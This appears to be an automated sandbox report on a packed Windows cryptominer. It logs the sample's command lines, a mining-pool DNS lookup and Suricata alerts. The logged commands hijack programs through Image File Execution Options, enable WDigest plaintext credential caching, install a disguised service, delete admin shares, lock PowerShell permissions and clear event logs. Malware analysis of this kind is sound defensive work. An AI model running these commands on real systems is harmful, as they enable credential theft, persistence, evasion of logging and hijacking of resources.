Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | June 5, 2023, 5:52 p.m. | June 5, 2023, 5:55 p.m. |
-
-
-
attrib.exe attrib -s -h -r -a C:\Windows\Fonts
2408
-
-
reg.exe reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
2140 -
reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f
2200 -
reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xmrig.exe" /v "deebugger" /d taskkill.exe /f
2252 -
reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f
2312 -
reg.exe reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
2372 -
reg.exe reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f
2476 -
sc.exe sc stop MetPipAtcivator
2536 -
sc.exe sc delete MetPipAtcivator
2628 -
sc.exe sc stop SetPipAtcivator
2700 -
sc.exe sc delete SetPipAtcivator
2756 -
sc.exe sc stop MicrosotMaims
2820 -
sc.exe sc delete MicrosotMaims
2892 -
sc.exe sc stop MicrosotMais
2964 -
sc.exe sc delete MicrosotMais
3028 -
taskkill.exe taskkill /f /t /im d1lhots.exe
2168 -
taskkill.exe taskkill /f /t /im rundlls.exe
2340 -
taskkill.exe taskkill /f /t /im dl1hots.exe
1712 -
-
net1.exe C:\Windows\system32\net1 user mm123$ /del
2812
-
-
net1.exe net1 user mm123$ /del
2520 -
-
net1.exe C:\Windows\system32\net1 stop mssecsvc2.0
2760
-
-
sc.exe sc delete mssecsvc2.0
2500 -
-
net1.exe C:\Windows\system32\net1 stop mssecsvc2.1
2676
-
-
sc.exe sc delete mssecsvc2.1
2944 -
svchost.exe c:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe
3024 -
svchost.exe c:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service
2968 -
svchost.exe c:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.
2436 -
svchost.exe c:\windows\Fonts\svchost.exe start MetPipAtcivator
2288 -
-
reg.exe reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
792 -
PING.EXE ping 127.1 -n 5
2088 -
sc.exe sc start MetPipAtcivator
3628 -
sc.exe sc start MetPipAtcivator
3688 -
-
net1.exe C:\Windows\system32\net1 share iPC$ /delete
3872
-
-
-
net1.exe C:\Windows\system32\net1 share admin$ /delete
4084
-
-
-
net1.exe C:\Windows\system32\net1 share c$ /delete
1568
-
-
-
net1.exe C:\Windows\system32\net1 share d$ /delete
3284
-
-
-
net1.exe C:\Windows\system32\net1 share e$ /delete
3340
-
-
-
net1.exe C:\Windows\system32\net1 share f$ /delete
3608
-
-
-
net1.exe C:\Windows\system32\net1 stop lanmanserver /y
3840
-
-
sc.exe sc config lanmanserver start= DISABLED
2724 -
sc.exe sc start PolicyAgent
1664 -
sc.exe sc config PolicyAgent start= AUTO
1552 -
sc.exe sc stop Graphipcs_PerfSvcs
3104 -
sc.exe sc delete Graphipcs_PerfSvcs
2004 -
WMIC.exe wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate
3240 -
attrib.exe attrib +s +h +r C:\Windows\svchost.exe
3592 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3720 -
cacls.exe cacls C:\Windows\svchost.exe /d everyone
3908 -
sc.exe sc stop conhost
4068 -
sc.exe sc delete conhost
4040 -
WMIC.exe wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate
2452 -
takeown.exe takeown /f C:\Windows\SysWOW64\conhost.exe /a
2040 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3144 -
cacls.exe cacls C:\Windows\SysWOW64\conhost.exe /d everyone
2980 -
reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f
3448 -
reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d taskkill.exe /f
3480 -
reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe" /v "debugger" /d taskkill.exe /f
3704 -
reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f
3988 -
reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe" /v "debugger" /d taskkill.exe /f
4020 -
reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f
3008 -
reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f
2228 -
reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f
2404 -
sc.exe sc start PolicyAgent
2712 -
sc.exe sc config PolicyAgent start= AUTO
2512 -
netsh.exe netsh ipsec static del all
416 -
netsh.exe netsh ipsec static add policy name=Aliyun
2384 -
netsh.exe netsh ipsec static add filterlist name=Allowlist
3760 -
netsh.exe netsh ipsec static add filterlist name=denylist
1564 -
netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
3452 -
netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
4052 -
netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
3500 -
netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
2216 -
netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
1676 -
netsh.exe netsh ipsec static add filteraction name=Allow action=permit
3580 -
netsh.exe netsh ipsec static add filteraction name=deny action=block
3832 -
netsh.exe netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
3672 -
netsh.exe netsh ipsec static set policy name=Aliyun assign=y
2916 -
taskkill.exe taskkill /f /t /im lsars.exe /im lsacs.exe
3656 -
taskkill.exe taskkill /f /t /im sqlservr.exe
3272 -
WMIC.exe wmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate
2564 -
attrib.exe attrib +s +h +r C:\Windows\Fonts\sqlservr.exe
3492 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3920 -
cacls.exe cacls C:\Windows\Fonts\sqlservr.exe /d everyone
3632 -
attrib.exe attrib +s +h +r C:\Windows\Fonts\csrss.exe
3084 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1484 -
cacls.exe cacls C:\Windows\Fonts\csrss.exe /d everyone
1632 -
WMIC.exe wmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate
3276 -
attrib.exe attrib +s +h +r C:\Windows\lsass.exe
2844 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1780 -
cacls.exe cacls C:\Windows\lsass.exe /d everyone
1800 -
sc.exe sc stop "Application Layre Gateway Saervice"
2788 -
sc.exe sc delete "Application Layre Gateway Saervice"
4124 -
taskkill.exe taskkill /f /t /im boy.exe
4172 -
attrib.exe attrib +s +h +r C:\Windows\boy.exe
4368 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4412 -
cacls.exe cacls C:\Windows\boy.exe /d everyone
4480 -
taskkill.exe taskkill /f /t /im powershell.exe
4536 -
takeown.exe takeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a
4728 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4776 -
cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
4844 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4900 -
cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
4968 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5024 -
cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
5092 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4152 -
cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
4236 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4308 -
cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
4348 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4456 -
cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system
4504 -
takeown.exe takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
4656 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4664 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
4612 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4796 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
4860 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4960 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
4932 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5076 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
2784 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4216 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
4328 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4248 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
4408 -
takeown.exe takeown /f C:\Windows\system32\sethc.exe /a
4452 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4564 -
cacls.exe cacls C:\Windows\system32\sethc.exe /g Administrators:f
4576 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3556 -
cacls.exe cacls C:\Windows\system32\sethc.exe /e /g Users:r
4804 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4872 -
cacls.exe cacls C:\Windows\system32\sethc.exe /e /g Administrators:r
4864 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5072 -
cacls.exe cacls C:\Windows\system32\sethc.exe /e /d SERVICE
5064 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4212 -
cacls.exe cacls C:\Windows\system32\sethc.exe /e /d "network service"
1364 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4424 -
cacls.exe cacls C:\Windows\system32\sethc.exe /e /g system:r
4484 -
taskkill.exe taskkill /f /t /im wscript.exe
4568 -
wevtutil.exe wevtutil cl "windows powershell"
4712 -
wevtutil.exe wevtutil cl "security"
1904 -
wevtutil.exe wevtutil cl "system"
4992
-
-
svchost.exe c:\windows\Fonts\svchost.exe start MetPipAtcivator
508 -
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\tem.vbs"
3124
-
Name | Response | Post-Analysis Lookup |
---|---|---|
x.f2pool.info | 183.111.205.12 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49199 -> 183.111.205.12:1230 | 2024792 | ET POLICY Cryptocurrency Miner Checkin | Potential Corporate Privacy Violation |
TCP 192.168.56.103:49199 -> 183.111.205.12:1230 | 2024792 | ET POLICY Cryptocurrency Miner Checkin | Potential Corporate Privacy Violation |
Suricata TLS
No Suricata TLS
resource name | TEXTINCLUDE |
name | TEXTINCLUDE | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d82ce0 | size | 0x00000151 | ||||||||||||||||||
name | TEXTINCLUDE | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d82ce0 | size | 0x00000151 | ||||||||||||||||||
name | TEXTINCLUDE | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d82ce0 | size | 0x00000151 | ||||||||||||||||||
name | RT_CURSOR | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d831d0 | size | 0x000000b4 | ||||||||||||||||||
name | RT_CURSOR | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d831d0 | size | 0x000000b4 | ||||||||||||||||||
name | RT_CURSOR | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d831d0 | size | 0x000000b4 | ||||||||||||||||||
name | RT_CURSOR | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d831d0 | size | 0x000000b4 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d848d8 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d848d8 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d848d8 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d848d8 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d848d8 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d848d8 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d848d8 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d848d8 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d848d8 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d848d8 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d848d8 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d848d8 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d848d8 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d848d8 | size | 0x00000144 | ||||||||||||||||||
name | RT_MENU | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d91424 | size | 0x00000284 | ||||||||||||||||||
name | RT_MENU | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d91424 | size | 0x00000284 | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d9266c | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d9266c | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d9266c | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d9266c | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d9266c | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d9266c | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d9266c | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d9266c | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d9266c | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d9266c | size | 0x0000018c | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d930b4 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d930b4 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d930b4 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d930b4 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d930b4 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d930b4 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d930b4 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d930b4 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d930b4 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d930b4 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d930b4 | size | 0x00000024 | ||||||||||||||||||
name | RT_GROUP_CURSOR | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d93100 | size | 0x00000022 | ||||||||||||||||||
name | RT_GROUP_CURSOR | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d93100 | size | 0x00000022 | ||||||||||||||||||
name | RT_GROUP_CURSOR | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d93100 | size | 0x00000022 | ||||||||||||||||||
name | RT_GROUP_ICON | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d931a0 | size | 0x00000014 | ||||||||||||||||||
name | RT_GROUP_ICON | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d931a0 | size | 0x00000014 | ||||||||||||||||||
name | RT_GROUP_ICON | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00d931a0 | size | 0x00000014 |
file | c:\Windows\Fonts\svchost.exe |
file | C:\Users\test22\AppData\Local\Temp\tem.vbs |
file | c:\Windows\Fonts\conhost.exe |
file | C:\Windows\Temp\csonhost.bat |
cmdline | attrib +s +h +r C:\Windows\svchost.exe |
cmdline | c:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service |
cmdline | takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a |
cmdline | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r |
cmdline | c:\windows\Fonts\svchost.exe start MetPipAtcivator |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system |
cmdline | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r |
cmdline | taskkill /f /t /im powershell.exe |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service" |
cmdline | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE |
cmdline | c:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management. |
cmdline | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system |
cmdline | wmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo y" |
cmdline | takeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r |
cmdline | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f |
cmdline | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f |
cmdline | wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate |
cmdline | c:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe |
cmdline | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service" |
cmdline | wmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r |
cmdline | wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate |
cmdline | wevtutil cl "windows powershell" |
cmdline | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f |
cmdline | cacls C:\Windows\svchost.exe /d everyone |
file | C:\Users\test22\AppData\Local\Temp\tem.vbs |
file | C:\Users\test22\AppData\Local\Temp\iexplore.exe |
wmi | SELECT * FROM Win32_Process WHERE name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe' |
wmi | SELECT * FROM Win32_Process WHERE name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe' |
wmi | SELECT * FROM Win32_Process WHERE name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe' |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process |
wmi | SELECT * FROM Win32_Process WHERE name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe' |
section | {u'size_of_data': u'0x003e3c00', u'virtual_address': u'0x009b3000', u'entropy': 7.999944304938328, u'name': u'UPX1', u'virtual_size': u'0x003e4000'} | entropy | 7.99994430494 | description | A section with a high entropy has been found | |||||||||
section | {u'size_of_data': u'0x0000dc00', u'virtual_address': u'0x00d97000', u'entropy': 6.9456545060373385, u'name': u'.rsrc', u'virtual_size': u'0x0000e000'} | entropy | 6.94565450604 | description | A section with a high entropy has been found | |||||||||
entropy | 1.0 | description | Overall entropy of this PE file is high |
section | UPX0 | description | Section name indicates UPX | ||||||
section | UPX1 | description | Section name indicates UPX |
cmdline | sc stop MetPipAtcivator |
cmdline | attrib +s +h +r C:\Windows\svchost.exe |
cmdline | net stop mssecsvc2.0 |
cmdline | net stop mssecsvc2.1 |
cmdline | sc delete mssecsvc2.1 |
cmdline | sc delete Graphipcs_PerfSvcs |
cmdline | attrib -s -h -r -a C:\Windows\Fonts |
cmdline | net share d$ /delete |
cmdline | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f |
cmdline | sc config PolicyAgent start= AUTO |
cmdline | sc stop MicrosotMaims |
cmdline | attrib +s +h +r C:\Windows\boy.exe |
cmdline | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f |
cmdline | sc stop Graphipcs_PerfSvcs |
cmdline | sc delete MicrosotMais |
cmdline | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f |
cmdline | taskkill /f /t /im sqlservr.exe |
cmdline | attrib +s +h +r C:\Windows\Fonts\sqlservr.exe |
cmdline | taskkill /f /t /im boy.exe |
cmdline | netsh ipsec static del all |
cmdline | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f |
cmdline | sc delete MetPipAtcivator |
cmdline | net user mm123$ /del |
cmdline | taskkill /f /t /im powershell.exe |
cmdline | netsh ipsec static add filterlist name=denylist |
cmdline | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f |
cmdline | netsh ipsec static add filterlist name=Allowlist |
cmdline | taskkill /f /t /im d1lhots.exe |
cmdline | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135 |
cmdline | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137 |
cmdline | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139 |
cmdline | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138 |
cmdline | wmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate |
cmdline | sc delete MicrosotMaims |
cmdline | taskkill /f /t /im lsars.exe /im lsacs.exe |
cmdline | sc stop MicrosotMais |
cmdline | sc delete SetPipAtcivator |
cmdline | netsh ipsec static add filteraction name=deny action=block |
cmdline | sc delete "Application Layre Gateway Saervice" |
cmdline | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f |
